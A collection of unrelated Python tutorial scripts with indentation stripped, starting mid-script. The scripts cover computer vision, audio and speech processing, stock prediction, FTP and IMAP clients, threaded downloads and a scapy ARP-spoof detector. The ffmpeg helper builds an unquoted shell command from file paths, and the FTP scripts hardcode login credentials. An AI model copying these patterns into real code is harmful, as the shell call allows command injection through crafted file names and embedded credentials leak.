cv2.line(edges, (x1, y1), (x2, y2), (255, 0, 0), 3)
# show images
cv2.imshow("image", image)
cv2.imshow("edges", edges)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import numpy as np
import matplotlib.pyplot as plt
import cv2
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert to grayscale
grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# perform edge detection
edges = cv2.Canny(grayscale, 30, 100)
# detect lines in the image using hough lines technique
lines = cv2.HoughLinesP(edges, 1, np.pi/180, 60, np.array([]), 50, 5)
# iterate over the output lines and draw them
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(image, (x1, y1), (x2, y2), color=(20, 220, 20), thickness=3)
# show the image
plt.imshow(image)
plt.show()
"""
A utility script used for converting audio samples to be
suitable for feature extraction
"""
import os
def convert_audio(audio_path, target_path, remove=False):
"""This function sets the audio audio_path to:
- 16000Hz Sampling rate
- one audio channel ( mono )
Params:
audio_path (str): the path of audio wav file you want to convert
target_path (str): target path to save your new converted wav file
remove (bool): whether to remove the old file after converting
Note that this function requires ffmpeg installed in your system."""
os.system(f"ffmpeg -i {audio_path} -ac 1 -ar 16000 {target_path}")
# os.system(f"ffmpeg -i {audio_path} -ac 1 {target_path}")
if remove:
os.remove(audio_path)
def convert_audios(path, target_path, remove=False):
"""Converts a path of wav files to:
- 16000Hz Sampling rate
- one audio channel ( mono )
and then put them into a new folder called target_path
Params:
path (str): the directory that contains the wav files you want to convert
target_path (str): the directory to save the new converted wav files in
remove (bool): whether to remove the old file after converting
Note that this function requires ffmpeg installed in your system."""
for dirpath, dirnames, filenames in os.walk(path):
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
target_dir = dirname.replace(path, target_path)
if not os.path.isdir(target_dir):
os.mkdir(target_dir)
for dirpath, _, filenames in os.walk(path):
for filename in filenames:
file = os.path.join(dirpath, filename)
if file.endswith(".wav"):
# it is a wav file
target_file = file.replace(path, target_path)
convert_audio(file, target_file, remove=remove)
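# For reference, the helpers above just shell out to ffmpeg; a hypothetical call
# such as convert_audio("raw/sample.wav", "out/sample.wav") runs the equivalent of:
#   ffmpeg -i raw/sample.wav -ac 1 -ar 16000 out/sample.wav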
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="""Convert (compress) wav files to a 16kHz sample rate and a mono audio channel (1 channel).
This utility helps compress wav files for training and testing""")
parser.add_argument("audio_path", help="Folder that contains wav files you want to convert")
parser.add_argument("target_path", help="Folder to save new wav files")
parser.add_argument("-r", "--remove", type=bool, help="Whether to remove the old wav file after converting", default=False)
args = parser.parse_args()
audio_path = args.audio_path
target_path = args.target_path
if os.path.isdir(audio_path):
if not os.path.isdir(target_path):
os.makedirs(target_path)
convert_audios(audio_path, target_path, remove=args.remove)
elif os.path.isfile(audio_path) and audio_path.endswith(".wav"):
if not target_path.endswith(".wav"):
target_path += ".wav"
convert_audio(audio_path, target_path, remove=args.remove)
else:
raise TypeError("The audio_path file you specified isn't appropriate for this operation")
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score
from utils import load_data
import os
import pickle
# load RAVDESS dataset
X_train, X_test, y_train, y_test = load_data(test_size=0.25)
# print some details
# number of samples in training data
print("[+] Number of training samples:", X_train.shape[0])
# number of samples in testing data
print("[+] Number of testing samples:", X_test.shape[0])
# number of features used
# this is a vector of features extracted
# using utils.extract_features() method
print("[+] Number of features:", X_train.shape[1])
# best model, determined by a grid search
model_params = {
'alpha': 0.01,
'batch_size': 256,
'epsilon': 1e-08,
'hidden_layer_sizes': (300,),
'learning_rate': 'adaptive',
'max_iter': 500,
}
# initialize Multi Layer Perceptron classifier
# with best parameters ( so far )
model = MLPClassifier(**model_params)
# train the model
print("[*] Training the model...")
model.fit(X_train, y_train)
# predict 25% of data to measure how good we are
y_pred = model.predict(X_test)
# calculate the accuracy
accuracy = accuracy_score(y_true=y_test, y_pred=y_pred)
print("Accuracy: {:.2f}%".format(accuracy*100))
# now we save the model
# make result directory if doesn't exist yet
if not os.path.isdir("result"):
os.mkdir("result")
pickle.dump(model, open("result/mlp_classifier.model", "wb"))
import pyaudio
import os
import wave
import pickle
from sys import byteorder
from array import array
from struct import pack
from sklearn.neural_network import MLPClassifier
from utils import extract_feature
THRESHOLD = 500
CHUNK_SIZE = 1024
FORMAT = pyaudio.paInt16
RATE = 16000
SILENCE = 30
def is_silent(snd_data):
"Returns 'True' if below the 'silent' threshold"
return max(snd_data) < THRESHOLD
def normalize(snd_data):
"Average the volume out"
MAXIMUM = 16384
times = float(MAXIMUM)/max(abs(i) for i in snd_data)
r = array('h')
for i in snd_data:
r.append(int(i*times))
return r
def trim(snd_data):
"Trim the blank spots at the start and end"
def _trim(snd_data):
snd_started = False
r = array('h')
for i in snd_data:
if not snd_started and abs(i)>THRESHOLD:
snd_started = True
r.append(i)
elif snd_started:
r.append(i)
return r
# Trim to the left
snd_data = _trim(snd_data)
# Trim to the right
snd_data.reverse()
snd_data = _trim(snd_data)
snd_data.reverse()
return snd_data
def add_silence(snd_data, seconds):
"Add silence to the start and end of 'snd_data' of length 'seconds' (float)"
r = array('h', [0 for i in range(int(seconds*RATE))])
r.extend(snd_data)
r.extend([0 for i in range(int(seconds*RATE))])
return r
def record():
"""
Record a word or words from the microphone and
return the data as an array of signed shorts.
Normalizes the audio, trims silence from the
start and end, and pads with 0.5 seconds of
blank sound to make sure VLC et al can play
it without getting chopped off.
"""
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT, channels=1, rate=RATE,
input=True, output=True,
frames_per_buffer=CHUNK_SIZE)
num_silent = 0
snd_started = False
r = array('h')
while 1:
# little endian, signed short
snd_data = array('h', stream.read(CHUNK_SIZE))
if byteorder == 'big':
snd_data.byteswap()
r.extend(snd_data)
silent = is_silent(snd_data)
if silent and snd_started:
num_silent += 1
elif not silent and not snd_started:
snd_started = True
if snd_started and num_silent > SILENCE:
break
sample_width = p.get_sample_size(FORMAT)
stream.stop_stream()
stream.close()
p.terminate()
r = normalize(r)
r = trim(r)
r = add_silence(r, 0.5)
return sample_width, r
def record_to_file(path):
"Records from the microphone and outputs the resulting data to 'path'"
sample_width, data = record()
data = pack('<' + ('h'*len(data)), *data)
wf = wave.open(path, 'wb')
wf.setnchannels(1)
wf.setsampwidth(sample_width)
wf.setframerate(RATE)
wf.writeframes(data)
wf.close()
if __name__ == "__main__":
# load the saved model (after training)
model = pickle.load(open("result/mlp_classifier.model", "rb"))
print("Please talk")
filename = "test.wav"
# record the file (start talking)
record_to_file(filename)
# extract features and reshape it
features = extract_feature(filename, mfcc=True, chroma=True, mel=True).reshape(1, -1)
# predict
result = model.predict(features)[0]
# show the result !
print("result:", result)
import soundfile
import numpy as np
import librosa
import glob
import os
from sklearn.model_selection import train_test_split
# all emotions on RAVDESS dataset
int2emotion = {
"01": "neutral",
"02": "calm",
"03": "happy",
"04": "sad",
"05": "angry",
"06": "fearful",
"07": "disgust",
"08": "surprised"
}
# we allow only these emotions
AVAILABLE_EMOTIONS = {
"angry",
"sad",
"neutral",
"happy"
}
def extract_feature(file_name, **kwargs):
"""
Extract feature from audio file file_name
Features supported:
- MFCC (mfcc)
- Chroma (chroma)
- MEL Spectrogram Frequency (mel)
- Contrast (contrast)
- Tonnetz (tonnetz)
e.g:
features = extract_feature(path, mel=True, mfcc=True)
"""
mfcc = kwargs.get("mfcc")
chroma = kwargs.get("chroma")
mel = kwargs.get("mel")
contrast = kwargs.get("contrast")
tonnetz = kwargs.get("tonnetz")
with soundfile.SoundFile(file_name) as sound_file:
X = sound_file.read(dtype="float32")
sample_rate = sound_file.samplerate
if chroma or contrast:
stft = np.abs(librosa.stft(X))
result = np.array([])
if mfcc:
mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T, axis=0)
result = np.hstack((result, mfccs))
if chroma:
chroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)
result = np.hstack((result, chroma))
if mel:
mel = np.mean(librosa.feature.melspectrogram(y=X, sr=sample_rate).T,axis=0)
result = np.hstack((result, mel))
if contrast:
contrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate).T,axis=0)
result = np.hstack((result, contrast))
if tonnetz:
tonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X), sr=sample_rate).T,axis=0)
result = np.hstack((result, tonnetz))
return result
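# A quick self-contained sketch of extract_feature(): synthesize a one-second 440 Hz
# tone, write it to a temporary wav file and extract features from it. With librosa's
# defaults, mfcc + chroma + mel gives a 40 + 12 + 128 = 180 dimensional vector.
import tempfile
example_sr = 16000
example_tone = np.sin(2 * np.pi * 440 * np.arange(example_sr) / example_sr).astype("float32")
example_tmp = tempfile.NamedTemporaryFile(suffix=".wav", delete=False)
example_tmp.close()
soundfile.write(example_tmp.name, example_tone, example_sr)
example_features = extract_feature(example_tmp.name, mfcc=True, chroma=True, mel=True)
print("feature vector length:", example_features.shape[0])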
def load_data(test_size=0.2):
X, y = [], []
for file in glob.glob("data/Actor_*/*.wav"):
# get the base name of the audio file
basename = os.path.basename(file)
# get the emotion label
emotion = int2emotion[basename.split("-")[2]]
# we allow only AVAILABLE_EMOTIONS we set
if emotion not in AVAILABLE_EMOTIONS:
continue
# extract speech features
features = extract_feature(file, mfcc=True, chroma=True, mel=True)
# add to data
X.append(features)
y.append(emotion)
# split the data to training and testing and return it
return train_test_split(np.array(X), y, test_size=test_size, random_state=7)
import speech_recognition as sr
import sys
duration = int(sys.argv[1])
# initialize the recognizer
r = sr.Recognizer()
print("Please talk")
with sr.Microphone() as source:
# read the audio data from the default microphone
audio_data = r.record(source, duration=duration)
print("Recognizing...")
# convert speech to text
text = r.recognize_google(audio_data)
print(text)
import speech_recognition as sr
import sys
filename = sys.argv[1]
# initialize the recognizer
r = sr.Recognizer()
# open the file
with sr.AudioFile(filename) as source:
# listen for the data (load audio to memory)
audio_data = r.record(source)
# recognize (convert from speech to text)
text = r.recognize_google(audio_data)
print(text)
import os
import time
from tensorflow.keras.layers import LSTM
# Window size or the sequence length
N_STEPS = 100
# Lookup step, 1 is the next day
LOOKUP_STEP = 90
# test ratio size, 0.2 is 20%
TEST_SIZE = 0.2
# features to use
FEATURE_COLUMNS = ["adjclose", "volume", "open", "high", "low"]
# date now
date_now = time.strftime("%Y-%m-%d")
### model parameters
N_LAYERS = 3
# LSTM cell
CELL = LSTM
# 256 LSTM neurons
UNITS = 256
# 40% dropout
DROPOUT = 0.4
### training parameters
# mean squared error loss
LOSS = "mse"
OPTIMIZER = "rmsprop"
BATCH_SIZE = 64
EPOCHS = 300
# Apple stock market
ticker = "AAPL"
ticker_data_filename = os.path.join("data", f"{ticker}_{date_now}.csv")
# model name to save
model_name = f"{date_now}_{ticker}-{LOSS}-{CELL.__name__}-seq-{N_STEPS}-step-{LOOKUP_STEP}-layers-{N_LAYERS}-units-{UNITS}"
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from yahoo_fin import stock_info as si
from collections import deque
import numpy as np
import pandas as pd
import random
def load_data(ticker, n_steps=50, scale=True, shuffle=True, lookup_step=1,
test_size=0.2, feature_columns=['adjclose', 'volume', 'open', 'high', 'low']):
"""
Loads data from the Yahoo Finance source, and optionally scales, shuffles and splits it.
Params:
ticker (str/pd.DataFrame): the ticker you want to load, examples include AAPL, TSLA, etc.
n_steps (int): the historical sequence length (i.e window size) used to predict, default is 50
scale (bool): whether to scale prices from 0 to 1, default is True
shuffle (bool): whether to shuffle the data, default is True
lookup_step (int): the future lookup step to predict, default is 1 (e.g next day)
test_size (float): ratio for test data, default is 0.2 (20% testing data)
feature_columns (list): the list of features to use to feed into the model, default is everything grabbed from yahoo_fin
"""
# see if ticker is already a loaded stock from yahoo finance
if isinstance(ticker, str):
# load it from yahoo_fin library
df = si.get_data(ticker)
elif isinstance(ticker, pd.DataFrame):
# already loaded, use it directly
df = ticker
else:
raise TypeError("ticker can be either a str or a pd.DataFrame instances")
# this will contain all the elements we want to return from this function
result = {}
# we will also return the original dataframe itself
result['df'] = df.copy()
# make sure that the passed feature_columns exist in the dataframe
for col in feature_columns:
assert col in df.columns
if scale:
column_scaler = {}
# scale the data (prices) from 0 to 1
for column in feature_columns:
scaler = preprocessing.MinMaxScaler()
df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
column_scaler[column] = scaler
# add the MinMaxScaler instances to the result returned
result["column_scaler"] = column_scaler
# add the target column (label) by shifting by lookup_step
df['future'] = df['adjclose'].shift(-lookup_step)
# the last lookup_step rows contain NaN in the future column
# get them before dropping NaNs
last_sequence = np.array(df[feature_columns].tail(lookup_step))
# drop NaNs
df.dropna(inplace=True)
sequence_data = []
sequences = deque(maxlen=n_steps)
for entry, target in zip(df[feature_columns].values, df['future'].values):
sequences.append(entry)
if len(sequences) == n_steps:
sequence_data.append([np.array(sequences), target])
# get the last sequence by appending the last n_step sequence with lookup_step sequence
# for instance, if n_steps=50 and lookup_step=10, last_sequence should be of 59 (that is 50+10-1) length
# this last_sequence will be used to predict in future dates that are not available in the dataset
last_sequence = list(sequences) + list(last_sequence)
# shift the last sequence by -1
last_sequence = np.array(pd.DataFrame(last_sequence).shift(-1).dropna())
# add to result
result['last_sequence'] = last_sequence
# construct the X's and y's
X, y = [], []
for seq, target in sequence_data:
X.append(seq)
y.append(target)
# convert to numpy arrays
X = np.array(X)
y = np.array(y)
# reshape X to fit the neural network
X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# split the dataset
result["X_train"], result["X_test"], result["y_train"], result["y_test"] = train_test_split(X, y,
test_size=test_size, shuffle=shuffle)
# return the result
return result
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3,
loss="mean_absolute_error", optimizer="rmsprop"):
model = Sequential()
for i in range(n_layers):
if i == 0:
# first layer
model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
elif i == n_layers - 1:
# last layer
model.add(cell(units, return_sequences=False))
else:
# hidden layers
model.add(cell(units, return_sequences=True))
# add dropout after each layer
model.add(Dropout(dropout))
model.add(Dense(1, activation="linear"))
model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
return model
from stock_prediction import create_model, load_data, np
from parameters import *
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
def plot_graph(model, data):
y_test = data["y_test"]
X_test = data["X_test"]
y_pred = model.predict(X_test)
y_test = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(np.expand_dims(y_test, axis=0)))
y_pred = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(y_pred))
plt.plot(y_test[-200:], c='b')
plt.plot(y_pred[-200:], c='r')
plt.xlabel("Days")
plt.ylabel("Price")
plt.legend(["Actual Price", "Predicted Price"])
plt.show()
def get_accuracy(model, data):
y_test = data["y_test"]
X_test = data["X_test"]
y_pred = model.predict(X_test)
y_test = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(np.expand_dims(y_test, axis=0)))
y_pred = np.squeeze(data["column_scaler"]["adjclose"].inverse_transform(y_pred))
y_pred = list(map(lambda current, future: int(float(future) > float(current)), y_test[:-LOOKUP_STEP], y_pred[LOOKUP_STEP:]))
y_test = list(map(lambda current, future: int(float(future) > float(current)), y_test[:-LOOKUP_STEP], y_test[LOOKUP_STEP:]))
return accuracy_score(y_test, y_pred)
def predict(model, data, classification=False):
# retrieve the last sequence from data
last_sequence = data["last_sequence"][:N_STEPS]
# retrieve the column scalers
column_scaler = data["column_scaler"]
# reshape the last sequence
last_sequence = last_sequence.reshape((last_sequence.shape[1], last_sequence.shape[0]))
# expand dimension
last_sequence = np.expand_dims(last_sequence, axis=0)
# get the prediction (scaled from 0 to 1)
prediction = model.predict(last_sequence)
# get the price (by inverting the scaling)
predicted_price = column_scaler["adjclose"].inverse_transform(prediction)[0][0]
return predicted_price
# load the data
data = load_data(ticker, N_STEPS, lookup_step=LOOKUP_STEP, test_size=TEST_SIZE,
feature_columns=FEATURE_COLUMNS, shuffle=False)
# construct the model
model = create_model(N_STEPS, loss=LOSS, units=UNITS, cell=CELL, n_layers=N_LAYERS,
dropout=DROPOUT, optimizer=OPTIMIZER)
model_path = os.path.join("results", model_name) + ".h5"
model.load_weights(model_path)
# evaluate the model
mse, mae = model.evaluate(data["X_test"], data["y_test"])
# calculate the mean absolute error (inverse scaling)
mean_absolute_error = data["column_scaler"]["adjclose"].inverse_transform([[mae]])[0][0]
print("Mean Absolute Error:", mean_absolute_error)
# predict the future price
future_price = predict(model, data)
print(f"Future price after {LOOKUP_STEP} days is {future_price:.2f}")
print("Accuracy Score:", get_accuracy(model, data))
plot_graph(model, data)
from stock_prediction import create_model, load_data
from tensorflow.keras.layers import LSTM
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import os
import pandas as pd
from parameters import *
# create these folders if they do not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
# load the data
data = load_data(ticker, N_STEPS, lookup_step=LOOKUP_STEP, test_size=TEST_SIZE, feature_columns=FEATURE_COLUMNS)
# construct the model
model = create_model(N_STEPS, loss=LOSS, units=UNITS, cell=CELL, n_layers=N_LAYERS,
dropout=DROPOUT, optimizer=OPTIMIZER)
# some tensorflow callbacks
checkpointer = ModelCheckpoint(os.path.join("results", model_name), save_weights_only=True, save_best_only=True, verbose=1)
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(data["X_test"], data["y_test"]),
callbacks=[checkpointer, tensorboard],
verbose=1)
model.save(os.path.join("results", model_name) + ".h5")
import ftplib
FTP_HOST = "ftp.dlptest.com"
FTP_USER = "dlpuserdlptest.com"
FTP_PASS = "SzMf7rTE4pCrf9dV286GuNe4N"
# connect to the FTP server
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# the name of file you want to download from the FTP server
filename = "some_file.txt"
with open(filename, "wb") as file:
# use FTP's RETR command to download the file
ftp.retrbinary(f"RETR {filename}", file.write)
# quit and close the connection
ftp.quit()
import ftplib
# FTP server credentials
FTP_HOST = "ftp.dlptest.com"
FTP_USER = "dlpuserdlptest.com"
FTP_PASS = "SzMf7rTE4pCrf9dV286GuNe4N"
# connect to the FTP server
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# local file name you want to upload
filename = "some_file.txt"
with open(filename, "rb") as file:
# use FTP's STOR command to upload the file
ftp.storbinary(f"STOR {filename}", file)
# list current files & directories
ftp.dir()
# quit and close the connection
ftp.quit()
import random
import os
import string
import secrets
# generate random integer between a and b (including a and b)
randint = random.randint(1, 500)
print("randint:", randint)
# generate random integer from range
randrange = random.randrange(0, 500, 5)
print("randrange:", randrange)
# get a random element from this list
choice = random.choice(["hello", "hi", "welcome", "bye", "see you"])
print("choice:", choice)
# get 5 random elements from 0 to 1000
choices = random.choices(range(1000), k=5)
print("choices:", choices)
# generate a random floating point number from 0.0 <= x <= 1.0
randfloat = random.random()
print("randfloat between 0.0 and 1.0:", randfloat)
# generate a random floating point number such that a <= x <= b
randfloat = random.uniform(5, 10)
print("randfloat between 5.0 and 10.0:", randfloat)
l = list(range(10))
print("Before shuffle:", l)
random.shuffle(l)
print("After shuffle:", l)
# generate a random string
randstring = ''.join(random.sample(string.ascii_letters, 16))
print("Random string with 16 characters:", randstring)
# crypto-safe byte generation
randbytes_crypto = os.urandom(16)
print("Random bytes for crypto use using os:", randbytes_crypto)
# or use this
randbytes_crypto = secrets.token_bytes(16)
print("Random bytes for crypto use using secrets:", randbytes_crypto)
# crypto-secure string generation
randstring_crypto = secrets.token_urlsafe(16)
print("Random strings for crypto use:", randstring_crypto)
# crypto-secure bits generation
randbits_crypto = secrets.randbits(16)
print("Random 16-bits for crypto use:", randbits_crypto)
import os
# print the current directory
print("The current directory:", os.getcwd())
# make an empty directory (folder)
os.mkdir("folder")
# running mkdir again with the same name raises FileExistsError, run this instead:
# if not os.path.isdir("folder"):
# os.mkdir("folder")
# changing the current directory to 'folder'
os.chdir("folder")
# printing the current directory now
print("The current directory changing the directory to folder:", os.getcwd())
# go back a directory
os.chdir("..")
# make several nested directories
os.makedirs("nested1/nested2/nested3")
# create a new text file
text_file = open("text.txt", "w")
# write to this file some text
text_file.write("This is a text file")
# close the file before renaming/moving it
text_file.close()
# rename text.txt to renamed-text.txt
os.rename("text.txt", "renamed-text.txt")
# replace (move) this file to another directory
os.replace("renamed-text.txt", "folder/renamed-text.txt")
# print all files and folders in the current directory
print("All folders & files:", os.listdir())
# print all files & folders recursively
for dirpath, dirnames, filenames in os.walk("."):
# iterate over directories
for dirname in dirnames:
print("Directory:", os.path.join(dirpath, dirname))
# iterate over files
for filename in filenames:
print("File:", os.path.join(dirpath, filename))
# delete that file
os.remove("folder/renamed-text.txt")
# remove the folder
os.rmdir("folder")
# remove nested folders
os.removedirs("nested1/nested2/nested3")
open("text.txt", "w").write("This is a text file")
# print some stats about the file
print(os.stat("text.txt"))
# get the file size for example
print("File size:", os.stat("text.txt").st_size)
import ftplib
import os
from datetime import datetime
FTP_HOST = "ftp.ed.ac.uk"
FTP_USER = "anonymous"
FTP_PASS = ""
# some utility functions that we are going to need
def get_size_format(n, suffix="B"):
# converts bytes to scaled format (e.g KB, MB, etc.)
for unit in ["", "K", "M", "G", "T", "P"]:
if n < 1024:
return f"{n:.2f}{unit}{suffix}"
n /= 1024
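# Quick sanity check of the helper above: 1,048,576 bytes is reported as "1.00MB".
print(get_size_format(1024 * 1024))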
def get_datetime_format(date_time):
# convert to datetime object
date_time = datetime.strptime(date_time, "%Y%m%d%H%M%S")
# convert to human readable date time string
return date_time.strftime("%Y/%m/%d %H:%M:%S")
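# Likewise for the time helper: MLSD "modify" facts look like "20230131120000".
print(get_datetime_format("20230131120000"))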
# initialize FTP session
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# print the welcome message
print(ftp.getwelcome())
# change the current working directory to 'pub' folder and 'maps' subfolder
ftp.cwd("pub/maps")
# LIST a directory
print("*"*50, "LIST", "*"*50)
ftp.dir()
# NLST command
print("*"*50, "NLST", "*"*50)
print("{:20} {}".format("File Name", "File Size"))
for file_name in ftp.nlst():
file_size = "N/A"
try:
ftp.cwd(file_name)
except Exception as e:
ftp.voidcmd("TYPE I")
file_size = get_size_format(ftp.size(file_name))
print(f"{file_name:20} {file_size}")
print("*"*50, "MLSD", "*"*50)
# using the MLSD command
print("{:30} {:19} {:6} {:5} {:4} {:4} {:4} {}".format("File Name", "Last Modified", "Size",
"Perm","Type", "GRP", "MODE", "OWNER"))
for file_data in ftp.mlsd():
# extract returning data
file_name, meta = file_data
# i.e directory, file or link, etc
file_type = meta.get("type")
if file_type == "file":
# if it is a file, change type of transfer data to IMAGE/binary
ftp.voidcmd("TYPE I")
# get the file size in bytes
file_size = ftp.size(file_name)
# convert it to human readable format (i.e in 'KB', 'MB', etc)
file_size = get_size_format(file_size)
else:
# not a file, may be a directory or other types
file_size = "N/A"
# date of last modification of the file
last_modified = get_datetime_format(meta.get("modify"))
# file permissions
permission = meta.get("perm")
# get the file unique id
unique_id = meta.get("unique")
# user group
unix_group = meta.get("unix.group")
# file mode, unix permissions
unix_mode = meta.get("unix.mode")
# owner of the file
unix_owner = meta.get("unix.owner")
# print all
print(f"{file_name:30} {last_modified:19} {file_size:7} {permission:5} {file_type:4} {unix_group:4} {unix_mode:4} {unix_owner}")
# quit and close the connection
ftp.quit()
import imaplib
import email
from email.header import decode_header
import webbrowser
import os
# account credentials
username = "youremailaddressprovider.com"
password = "yourpassword"
# number of top emails to fetch
N = 3
# create an IMAP4 class with SSL, use your email provider's IMAP server
imap = imaplib.IMAP4_SSL("imap.gmail.com")
# authenticate
imap.login(username, password)
# select a mailbox (in this case, the inbox mailbox)
# use imap.list() to get the list of mailboxes
status, messages = imap.select("INBOX")
# total number of emails
messages = int(messages[0])
for i in range(messages-4, messages-N-4, -1):
# fetch the email message by ID
res, msg = imap.fetch(str(i), "(RFC822)")
for response in msg:
if isinstance(response, tuple):
# parse a bytes email into a message object
msg = email.message_from_bytes(response[1])
# decode the email subject
subject = decode_header(msg["Subject"])[0][0]
if isinstance(subject, bytes):
# if it's a bytes, decode to str
subject = subject.decode()
# email sender
from_ = msg.get("From")
print("Subject:", subject)
print("From:", from_)
# if the email message is multipart
if msg.is_multipart():
# iterate over email parts
for part in msg.walk():
# extract content type of email
content_type = part.get_content_type()
content_disposition = str(part.get("Content-Disposition"))
try:
# get the email body
body = part.get_payload(decode=True).decode()
except:
pass
if content_type == "text/plain" and "attachment" not in content_disposition:
# print text/plain emails and skip attachments
print(body)
elif "attachment" in content_disposition:
# download attachment
filename = part.get_filename()
if filename:
if not os.path.isdir(subject):
# make a folder for this email (named after the subject)
os.mkdir(subject)
filepath = os.path.join(subject, filename)
# download attachment and save it
open(filepath, "wb").write(part.get_payload(decode=True))
else:
# extract content type of email
content_type = msg.get_content_type()
# get the email body
body = msg.get_payload(decode=True).decode()
if content_type == "text/plain":
# print only text email parts
print(body)
if content_type == "text/html":
# if it's HTML, create a new HTML file and open it in browser
if not os.path.isdir(subject):
# make a folder for this email (named after the subject)
os.mkdir(subject)
filename = f"{subject[:50]}.html"
filepath = os.path.join(subject, filename)
# write the file
open(filepath, "w").write(body)
# open in the default browser
webbrowser.open(filepath)
print("="*100)
# close the connection and logout
imap.close()
imap.logout()
import requests
from concurrent.futures import ThreadPoolExecutor
from time import perf_counter
# number of threads to spawn
n_threads = 5
# read 1024 bytes every time
buffer_size = 1024
def download(url):
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the file name
filename = url.split("/")[-1]
with open(filename, "wb") as f:
for data in response.iter_content(buffer_size):
# write data read to the file
f.write(data)
if __name__ == "__main__":
urls = [
"https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
"https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
"https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
"https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
"https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
] * 5
t = perf_counter()
with ThreadPoolExecutor(max_workers=n_threads) as pool:
pool.map(download, urls)
print(f"Time took: {perf_counter() - t:.2f}s")
import requests
from threading import Thread
from queue import Queue
# thread-safe queue initialization
q = Queue()
# number of threads to spawn
n_threads = 5
# read 1024 bytes every time
buffer_size = 1024
def download():
global q
while True:
# get the url from the queue
url = q.get()
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the file name
filename = url.split("/")[-1]
with open(filename, "wb") as f:
for data in response.iter_content(buffer_size):
# write data read to the file
f.write(data)
# we're done downloading the file
q.task_done()
if __name__ == "__main__":
urls = [
"https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
"https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
"https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
"https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
"https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
] * 5
# fill the queue with all the urls
for url in urls:
q.put(url)
# start the threads
for t in range(n_threads):
worker = Thread(target=download)
# daemon thread means a thread that will end when the main thread ends
worker.daemon = True
worker.start()
# wait until the queue is empty
q.join()
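# note: the workers are daemon threads, so they do not keep the program alive on their
# own; q.join() blocks the main thread until every queued URL has been marked done via
# q.task_done(), after which the program exits and the idle daemon workers die with it.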
import requests
from time import perf_counter
# read 1024 bytes every time
buffer_size = 1024
def download(url):
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the file name
filename = url.split("/")[-1]
with open(filename, "wb") as f:
for data in response.iter_content(buffer_size):
# write data read to the file
f.write(data)
if __name__ == "__main__":
urls = [
"https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
"https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
"https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
"https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
"https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
] * 5
t = perf_counter()
for url in urls:
download(url)
print(f"Time took: {perf_counter() - t:.2f}s")
from scapy.all import Ether, ARP, srp, sniff, conf
def get_mac(ip):
"""
Returns the MAC address of ip; if it is unable to find it
for some reason, raises IndexError
"""
p = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip)
result = srp(p, timeout=3, verbose=False)[0]
return result[0][1].hwsrc
def process(packet):
# if the packet is an ARP packet
if packet.haslayer(ARP):
# if it is an ARP response (ARP reply)
if packet[ARP].op == 2:
try:
# get the real MAC address of the sender
real_mac = get_mac(packet[ARP].psrc)
# get the MAC address from the packet sent to us
response_mac = packet[ARP].hwsrc
# if they're different, there is definitely an attack
if real_mac != response_mac:
print(f"[!] You are under attack, REAL-MAC: {real_mac.upper()}, FAKE-MAC: {response_mac.upper()}")
except IndexError:
# unable to find the real mac
# may be a fake IP or firewall is blocking packets
pass
if __name__ == "__main__":
import sys
try:
iface = sys.argv[1]
except IndexError:
iface = conf.iface
